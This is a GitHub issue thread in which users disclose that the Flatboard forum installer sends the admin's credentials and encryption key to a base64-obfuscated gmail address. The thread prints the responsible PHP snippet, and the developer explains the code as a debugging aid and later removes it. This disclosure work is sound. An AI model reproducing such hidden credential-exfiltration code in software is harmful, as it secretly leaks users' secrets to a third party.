flatboard icon indicating copy to clipboard operation
flatboard copied to clipboard

Published 20 hours ago verified publisher icon Fred89

what the hell is this???

Open atomGit opened this issue 1 year ago • 6 comments

i installed the forum and it sends an email containing my user name and password to a gmail address? [email protected]

wtf?

atomGit avatar Dec 27 '23 15:12 atomGit

I can confirm this behavior, here is the code that sends the email:

// lib/install.file:166
if (DEBUG_MODE) {
    $description  = '<h6>'.$config['description'].'</h6>';
    $description .= '<br/>'.KEY.'<br/>';
    $description .= $_POST['admin'].'<br/>';
	$description .= $config['mail'].'<br/>';
	$description .= '<a href="' .HTML_BASEPATH.'">' .$config['title']. '</a>'."\n";
	Util::sendMail($config['title'], $config['mail'], base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ=='), $lang['flatBoard_installer'], $description, 'html');
}

base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ==') corresponds to [email protected]. The content of the email is:

<h6>Forum's description</h6><br/>encryption key<br/>user@pass<br/>admin's email<br/><a href="forum's url">forum's name</a>

Debug mode is enabled by default as shown in the init.php file:

// init.php:49
const DEBUG_MODE 		= TRUE;

simon511000 avatar Dec 27 '23 18:12 simon511000

I created an announcement in the forum to warn other users

simon511000 avatar Dec 27 '23 19:12 simon511000

this whole thing has a strange odor to it - 3.1 was released in 2/2023, so the dev(s) knew this was happening for 10 months - there's no reason to have let it go that long and there's absolutely no reason to ever send these credentials anywhere, not for debugging reasons or any other

also all the other unnecessarily base64 encoded stuff

atomGit avatar Dec 27 '23 22:12 atomGit

I can confirm, I logged into my client area, and it's clear that the archive hasn't been updated since 03/23/2023. image

I also agree with you; it's very strange. If it was genuinely for debugging, what's the point of sending information via email instead of just displaying it in the console or writing it to a log file?

And how are these details useful for debugging, considering they are already accessible in the forum data files?

simon511000 avatar Dec 28 '23 06:12 simon511000

Hi! Don't worry for this old feature on Flatboard 2.0 I added a new hash for password in User.lib.php on line 130 $config['admin'] = hash_hmac('sha1', $_POST['password'], KEY);

At that time several users had problems when updating with this new hash. I therefore added this piece of code which is only activated if debug mode is ON in order to see if the installation script returned the correct hashed password, and therefore had access with user authorization at the installation site.

So don't panic, I don't work for the government and Flatboard is rarely used anyway (I received a 20th email since March 23, 2023!)

I will remove this piece of code in a future Flatboard update :)

Fred89 avatar Dec 28 '23 16:12 Fred89

As Simon commented on the forum, a simple DEBUG_MODE = FALSE; is enough. Happy New Year's Eve

Fred89 avatar Dec 28 '23 17:12 Fred89

The code has been removed in the new version of Flatboard 3.2 "SHIBA"

Fred89 avatar Jun 03 '24 08:06 Fred89